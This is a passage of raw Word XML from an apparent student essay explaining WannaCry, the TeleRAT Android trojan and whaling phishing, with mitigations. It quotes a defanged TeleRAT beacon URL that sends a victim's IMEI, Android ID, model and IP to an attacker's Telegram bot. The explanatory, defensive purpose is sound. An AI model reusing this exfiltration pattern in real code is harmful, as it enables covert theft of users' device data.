      <w:r w:rsidRPr="006010C3">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">) Explain how the malware examples WannaCry and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>TeleRAT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> operate and discuss effective</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc165489682"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidR="00077E52">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>mitigation strategies for each.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="52CFC343" w14:textId="3A1EBCFE" w:rsidR="3358189A" w:rsidRPr="006010C3" w:rsidRDefault="3358189A" w:rsidP="3358189A"/>
    <w:p w14:paraId="57547BBA" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">WannaCry ransomware was used to carry out a worldwide cyberattack in 2017 that exploited Windows systems that did not have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> exploit patch.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1B7D50" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="6F1F780D" w14:textId="5CB97D44" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">WannaCry works by encrypting the user’s files preventing the user from accessing them. Then demanding payment for the files to be decrypted, the payment was requested through bit coin. It also had a countdown that once reached would delete the files. Ransomware is normally used to target people however with WannaCry it infected any system it could and in just a couple of hours it infected 230,000 computers. </w:t>
      </w:r>
      <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1637638450"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION AleNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[7]</w:t>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="11B538B3" w14:textId="2B3C9003" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">WannaCry is a type of malware called a worm that could self-replicate and automatically spread to other computer systems on a network without anyone interacting with it. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1260285509"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION MalNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[8]</w:t>
          </w:r>
          <w:r w:rsidR="00F9011D" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003B423F" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1585181228"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="003B423F" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003B423F" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Bar23 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="003B423F" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[9]</w:t>
          </w:r>
          <w:r w:rsidR="003B423F" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="028EEA83" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="3FC7574A" w14:textId="77A544A0" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">There are mitigation strategies to prevent WannaCry and other ransomware malware. One example is to have anti-virus software that can prevent your computer being infected from all types of malwares (mainly ransomware). Another migration strategy is to use software that can detect and block ransomware threats. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1102188558"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION MalNA1 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="0900BF86" w14:textId="477A137F" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="7CC03DBC" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="760D4F21" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">TeleRat comes from people maliciously using Telegrams Bot API which has led to the creation of Trojan that can be carried out using a Telegram Bot. TeleRat is used to steal information from infected Android devices. This information ranges from a user’s call history to file listings. TeleRat works by creating these files: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A18C50" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="4BF4F997" w14:textId="162163FC" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t>[IMEI] numbers.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E4E4B" w14:textId="0D46E187" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="0054268F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t>[IMEI]acc.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66E107" w14:textId="6CADC535" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">[IMEI]sms.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C86871" w14:textId="3A098AC9" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">1.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E05C996" w14:textId="5F6769AB" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Image.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1342ED" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="32489581" w14:textId="5A396311" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Then it puts them onto the SD card in the user’s phone. After that these files are then sent from the SD card to the upload server. This is all done after the first time the app launches. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259C4EA8" w14:textId="77777777" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71"/>
    <w:p w14:paraId="78823FDF" w14:textId="7E44A21F" w:rsidR="00DC4D71" w:rsidRPr="006010C3" w:rsidRDefault="00DC4D71" w:rsidP="00DC4D71">
      <w:r w:rsidRPr="006010C3">
        <w:t>Finally the upload server uses this beacon “hxxp://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]?text=</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>نصب</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>جدید</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>\n [IMEI] \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>nIMEI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> : :[IMEI]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>nAndroid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> ID : [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>AndroidID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>]\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>nModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> : [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>PhoneModel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>]\n[IP] \n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>nIMEI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>دستگاه</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">: [IMEI]”  for passing information back to the Telegram bot. The Telegram bot that chosen is the one that matches the bot id within the RAT source code. From that point onwards the beacon is used to gather data from the app to the Telegram bot based on certain commands being used. To avoid encountering </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>TeleRAT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> there are mitigation strategies that can be carried out. One example is to not unofficial applications be installed on your device. Another example is to not use any third party app stores. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-577444773"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Ruc18 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="54DA9FD4" w14:textId="77777777" w:rsidR="00BF705B" w:rsidRPr="006010C3" w:rsidRDefault="00BF705B" w:rsidP="002814F1"/>
    <w:p w14:paraId="5F14D1A5" w14:textId="77777777" w:rsidR="00EE2E2E" w:rsidRPr="006010C3" w:rsidRDefault="00EE2E2E" w:rsidP="002814F1"/>
    <w:p w14:paraId="6F460570" w14:textId="51BC5CF6" w:rsidR="002814F1" w:rsidRPr="006010C3" w:rsidRDefault="002814F1" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc165489683"/>
      <w:r w:rsidRPr="006010C3">
        <w:lastRenderedPageBreak/>
        <w:t>ii) Describe the implementation of the phishing attacks known as Whaling and Pharming and</w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc165489684"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidR="0097434A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>discuss effective strategies to mitigate the risks associated with them.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="69EC82C5" w14:textId="77777777" w:rsidR="00711CEF" w:rsidRPr="006010C3" w:rsidRDefault="00711CEF" w:rsidP="0062208D"/>
    <w:p w14:paraId="4DCDD51B" w14:textId="0625A3EA" w:rsidR="000B3BA2" w:rsidRPr="006010C3" w:rsidRDefault="00696510" w:rsidP="0062208D">
      <w:r w:rsidRPr="006010C3">
        <w:t>Phishing</w:t>
      </w:r>
      <w:r w:rsidR="00302AA8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F7ACA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">is a malicious practice where an attacker will </w:t>
      </w:r>
      <w:r w:rsidR="00BF47A4" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">pretend to be </w:t>
      </w:r>
      <w:r w:rsidR="00317552" w:rsidRPr="006010C3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="001E3977" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> legitimate </w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">person </w:t>
      </w:r>
      <w:r w:rsidR="001E3977" w:rsidRPr="006010C3">
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00317552" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">company to </w:t>
      </w:r>
      <w:r w:rsidR="001F29A7" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">mislead </w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00B34292" w:rsidRPr="006010C3">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A1A14" w:rsidRPr="006010C3">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="005F18AC" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> gain </w:t>
      </w:r>
      <w:r w:rsidR="000C6EF5" w:rsidRPr="006010C3">
        <w:t>money,</w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F433E8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">or data such as </w:t>
      </w:r>
      <w:r w:rsidR="001F29A7" w:rsidRPr="006010C3">
        <w:t>login formation.</w:t>
      </w:r>
      <w:r w:rsidR="00DC3683" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F18AC" w:rsidRPr="006010C3">
        <w:t>This is normally done through email</w:t>
      </w:r>
      <w:r w:rsidR="000C6EF5" w:rsidRPr="006010C3">
        <w:t>, social media</w:t>
      </w:r>
      <w:r w:rsidR="005F18AC" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> or through text message.</w:t>
      </w:r>
      <w:r w:rsidR="007509D8" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1411736307"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION CisNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="290B9C2B" w14:textId="1900A9C6" w:rsidR="00B34292" w:rsidRPr="006010C3" w:rsidRDefault="00304A0B" w:rsidP="0062208D">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">Whaling is </w:t>
      </w:r>
      <w:r w:rsidR="000B3BA2" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">a type of </w:t>
      </w:r>
      <w:r w:rsidR="007E26FB" w:rsidRPr="006010C3">
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidR="000B3BA2" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> attack </w:t>
      </w:r>
      <w:r w:rsidR="00D969E4" w:rsidRPr="006010C3">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="007F0121" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is aimed</w:t>
      </w:r>
      <w:r w:rsidR="007E26FB" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC04A1" w:rsidRPr="006010C3">
        <w:t>at high</w:t>
      </w:r>
      <w:r w:rsidR="003A3864" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> level people within companies</w:t>
      </w:r>
      <w:r w:rsidR="00FA19D5" w:rsidRPr="006010C3">
        <w:t>, typically done through email</w:t>
      </w:r>
      <w:r w:rsidR="00157694" w:rsidRPr="006010C3">
        <w:t>. Whaling</w:t>
      </w:r>
      <w:r w:rsidR="007908BD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> attacks are more </w:t>
      </w:r>
      <w:r w:rsidR="00AF3473" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">personal as the attacker will use public information about the company and the executive they are </w:t>
      </w:r>
      <w:r w:rsidR="009C0189" w:rsidRPr="006010C3">
        <w:t>targeting</w:t>
      </w:r>
      <w:r w:rsidR="00AF3473" w:rsidRPr="006010C3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB62AA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00146A2F" w:rsidRPr="006010C3">
        <w:t>Along with that</w:t>
      </w:r>
      <w:r w:rsidR="001A6650" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> the email </w:t>
      </w:r>
      <w:r w:rsidR="00FA19D5" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">used on </w:t>
      </w:r>
      <w:r w:rsidR="00C822F3" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">the target </w:t>
      </w:r>
      <w:r w:rsidR="00FD67CA" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="001D78B5" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">have professional </w:t>
      </w:r>
      <w:r w:rsidR="00245849" w:rsidRPr="006010C3">
        <w:t>language used throughout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58B4EF" w14:textId="74032DA6" w:rsidR="00076C32" w:rsidRPr="006010C3" w:rsidRDefault="00076C32" w:rsidP="00076C32">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">If the email is convincing then the company that target is </w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
        <w:t>a part</w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> of can suffer multiple consequences such as, loss of data, loss of money and a poor reputation for falling for the scam.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2071154069"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION NatNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="007E2525" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="1AA433F6" w14:textId="77777777" w:rsidR="00E74707" w:rsidRPr="006010C3" w:rsidRDefault="00E74707" w:rsidP="00076C32"/>
    <w:p w14:paraId="63109DBE" w14:textId="525F4808" w:rsidR="00CB669F" w:rsidRPr="006010C3" w:rsidRDefault="00583532" w:rsidP="0062208D">
      <w:r w:rsidRPr="006010C3">
        <w:t xml:space="preserve">There are migration strategies to help prevent </w:t>
      </w:r>
      <w:r w:rsidR="00351CED" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">companies being </w:t>
      </w:r>
      <w:r w:rsidR="005A4D90" w:rsidRPr="006010C3">
        <w:t>affected</w:t>
      </w:r>
      <w:r w:rsidR="00351CED" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>whaling emails</w:t>
      </w:r>
      <w:r w:rsidR="00351CED" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">. One </w:t>
      </w:r>
      <w:r w:rsidR="009E658C" w:rsidRPr="006010C3">
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00351CED" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> is companies could use </w:t>
      </w:r>
      <w:r w:rsidR="009E658C" w:rsidRPr="006010C3">
        <w:t xml:space="preserve">good quality </w:t>
      </w:r>
      <w:r w:rsidR="00F433E8" w:rsidRPr="006010C3">
        <w:t>anti-virus</w:t>
      </w:r>
      <w:r w:rsidR="001B67E7" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> software that </w:t>
      </w:r>
      <w:r w:rsidR="00351CED" w:rsidRPr="006010C3">
        <w:t>could prevent</w:t>
      </w:r>
      <w:r w:rsidR="001B67E7" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> whaling emails from getting into the targets email </w:t>
      </w:r>
      <w:r w:rsidR="005A4D90" w:rsidRPr="006010C3">
        <w:t>inbox.</w:t>
      </w:r>
      <w:r w:rsidR="004A558A" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> Another migration strategy is using email scanning software that in real time can scan the links in an email and tell if they are suspicious reducing the number of whaling emails.</w:t>
      </w:r>
      <w:r w:rsidR="003B6668" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F433E8" w:rsidRPr="006010C3">
        <w:t>Finally,</w:t>
      </w:r>
      <w:r w:rsidR="003B6668" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> security awareness training within the company can help employees know what to look for and to know what to avoid.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1129906543"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74707" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION mimNA \l 1033 </w:instrText>
          </w:r>
